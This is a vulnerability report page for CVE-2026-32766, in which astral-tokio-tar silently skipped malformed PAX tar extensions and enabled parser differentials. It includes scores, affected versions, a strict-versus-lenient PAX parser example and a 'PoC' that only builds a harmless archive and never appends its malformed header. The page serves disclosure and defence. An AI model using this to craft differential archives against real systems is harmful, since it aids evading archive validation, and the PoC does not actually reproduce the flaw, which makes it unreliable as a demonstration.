Security Vulnerability Report
CVE-2026-32766 CVSS 5.3 MEDIUM

CVE-2026-32766

Published: 2026-03-20 00:16:18
Last Modified: 2026-04-17 21:09:17

Description

astral-tokio-tar is a tar archive reading/writing library for async Rust. In versions 0.5.6 and earlier, malformed PAX extensions were silently skipped when parsing tar archives. This silent skipping (rather than rejection) of invalid PAX extensions could be used as a building block for a parser differential, for example by silently skipping a malformed GNU “long link” extension so that a subsequent parser would misinterpret the extension. In practice, exploiting this behavior in astral-tokio-tar requires a secondary misbehaving tar parser, i.e. one that insufficiently validates malformed PAX extensions and interprets them rather than skipping or erroring on them. This vulnerability is considered low-severity as it requires a separate vulnerability against any unrelated tar parser. This issue has been fixed in version 0.6.0.
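The description turns on one design choice: a malformed PAX record should fail the whole header rather than be dropped. The following is an added illustration, not code from astral-tokio-tar or its advisory: a strict parser for the PAX extended-header record format ("<len> <key>=<value>\n", where <len> is the decimal byte length of the whole record, newline included) beside a constructed length-ignoring parser that stands in for the kind of secondary parser the description mentions. All sample bytes are constructed; the differential appears when the same bytes are fed to both.

```rust
// Added example, not the astral-tokio-tar code: a strict PAX extended-header
// record parser that rejects any malformed record instead of skipping it.
// A PAX record is "<len> <key>=<value>\n", where <len> is the decimal byte
// length of the whole record, counting the length field itself and the newline.
#[derive(Debug, PartialEq)]
pub struct PaxRecord { pub key: String, pub value: Vec<u8> }

#[derive(Debug, PartialEq)]
pub enum PaxError { BadLength, Truncated, MissingNewline, MissingEquals, NonUtf8Key }

/// Parse a PAX extended-header body; the first malformed record fails the whole header.
pub fn parse_pax_strict(mut data: &[u8]) -> Result<Vec<PaxRecord>, PaxError> {
    let mut out = Vec::new();
    while !data.is_empty() {
        // Length field: one or more ASCII digits followed by exactly one space.
        let sp = data.iter().position(|&b| b == b' ').ok_or(PaxError::BadLength)?;
        let len_str = std::str::from_utf8(&data[..sp]).map_err(|_| PaxError::BadLength)?;
        if len_str.is_empty() || !len_str.bytes().all(|b| b.is_ascii_digit()) {
            return Err(PaxError::BadLength);
        }
        let len: usize = len_str.parse().map_err(|_| PaxError::BadLength)?;
        // The length must cover "<len> " plus at least the trailing newline.
        if len < sp + 2 { return Err(PaxError::BadLength); }
        if len > data.len() { return Err(PaxError::Truncated); }
        let record = &data[..len];
        if record[len - 1] != b'\n' { return Err(PaxError::MissingNewline); }
        let body = &record[sp + 1..len - 1];
        let eq = body.iter().position(|&b| b == b'=').ok_or(PaxError::MissingEquals)?;
        let key = std::str::from_utf8(&body[..eq]).map_err(|_| PaxError::NonUtf8Key)?;
        if key.is_empty() { return Err(PaxError::MissingEquals); }
        out.push(PaxRecord { key: key.to_string(), value: body[eq + 1..].to_vec() });
        data = &data[len..];
    }
    Ok(out)
}

/// Constructed stand-in for the kind of secondary parser the description mentions:
/// it never checks <len>, so a record with a wrong length is still interpreted.
/// Comparing its output with parse_pax_strict on the same bytes shows the differential.
pub fn parse_pax_lenient(data: &[u8]) -> Vec<PaxRecord> {
    data.split(|&b| b == b'\n').filter(|l| !l.is_empty()).filter_map(|line| {
        let sp = line.iter().position(|&b| b == b' ')?;
        let eq = line[sp + 1..].iter().position(|&b| b == b'=')?;
        let key = std::str::from_utf8(&line[sp + 1..sp + 1 + eq]).ok()?;
        Some(PaxRecord { key: key.to_string(), value: line[sp + 2 + eq..].to_vec() })
    }).collect()
}
```

A consumer that calls the strict parser rejects the archive outright, so there is no partially parsed header left for a downstream tool to read differently.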

CVSS Details

CVSS 3.1 (Primary): 5.3 MEDIUM
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVSS 4.0 (Secondary): 1.7 LOW
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness: CWE-436

Configurations (Affected Products)

cpe:2.3:a:astral:astral-tokio-tar:*:*:*:*:*:rust:*:* - VULNERABLE
astral-tokio-tar <= 0.5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
rust
// PoC for CVE-2026-32766: Malformed PAX Extension Handling
// This example demonstrates how a malformed PAX header might be constructed.
// Vulnerable versions of astral-tokio-tar would skip this silently.
// Assumed Cargo dependencies (not stated on the page): tokio with the "macros" and
// "rt-multi-thread" features, and astral-tokio-tar, whose library is imported as tokio_tar.
use std::io::Cursor;
use tokio_tar::{Builder, EntryType, Header};

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let mut ar = Builder::new(Vec::new());

    // Create a standard file entry with an empty body.
    let mut header = Header::new_gnu();
    header.set_path("legitimate_file.txt")?;
    header.set_size(0);
    header.set_cksum();
    ar.append(&header, &mut Cursor::new(Vec::<u8>::new())).await?;

    // Simulate a malformed PAX extension. The header is built but, as in the
    // original, not appended: in a real exploit, specific bytes would be crafted
    // to trigger differential parsing in a secondary parser.
    let mut pax_header = Header::new_gnu();
    pax_header.set_entry_type(EntryType::XHeader); // PAX extended header (type 'x')
    // Set a size that implies the presence of PAX attributes.
    pax_header.set_size(50);
    pax_header.set_cksum();
    // In a vulnerable version, if the subsequent bytes are malformed,
    // tokio-tar would skip this entry without error.
    // Note: Actual exploitation requires a secondary parser that
    // interprets this skipped data maliciously.

    // Finish the archive so the end-of-archive blocks are written.
    let _archive: Vec<u8> = ar.into_inner().await?;
    println!("CVE-2026-32766 PoC: Archive with PAX extension created.");
    Ok(())
}

References

https://github.com/astral-sh/tokio-tar/commit/e5e0139cae4577eeedf5fc16b65e690bf988ce52 (Patch)
https://github.com/astral-sh/tokio-tar/security/advisories/GHSA-6gx3-4362-rf54 (Mitigation, Vendor Advisory)